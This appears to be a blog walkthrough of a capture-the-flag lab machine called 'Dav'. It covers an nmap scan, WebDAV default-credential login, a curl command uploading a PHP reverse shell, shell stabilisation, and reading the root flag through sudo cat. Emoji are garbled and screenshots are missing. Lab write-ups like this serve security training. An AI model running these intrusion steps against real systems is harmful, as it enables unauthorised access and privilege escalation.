Dav
Dav
Dav
1
2
3
4
5
6
7
8
9
10
nmap -sS -sV -sC -p- 10.80.153.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-22 07:19 UTC
Nmap scan report for ip-10-80-153-92.eu-west-1.compute.internal (10.80.153.92)
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
π Port Discovery & WebDAV Enumeration
π΅οΈ After the nmap scan, I ran Feroxbuster: 
π» It shows WebDAV is running: 
We need a password. I searched for default credentials:
I found them, and they worked:
We got a hash: 
π΅οΈ WebDAV Exploitation
π‘ I referred to WebDAV attack resources: https://www.drakeaxelrod.com/notes/network/webdav-attacks
We verified that PHP execution works: 
Letβs put the hash aside for a moment and try a reverse shell:
1
curl -I -X PUT http://10.80.153.92/webdav/shell.php --data-binary @r.php -u wampp:xampp
β‘ I uploaded a PHP reverse shell and successfully connected back: 
1
2
3
4
python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
^Z
stty raw -echo; fg
β‘ Privilege Escalation
π I ran these commands to stabilize the shell and retrieved the user flag: 
I ran sudo -l to check our privileges. Since we can run cat with sudo, I read the root flag directly from /root/root.txt: 
π It felt like a quick shortcut, but it worked!
This post is licensed under CC BY 4.0 by the author.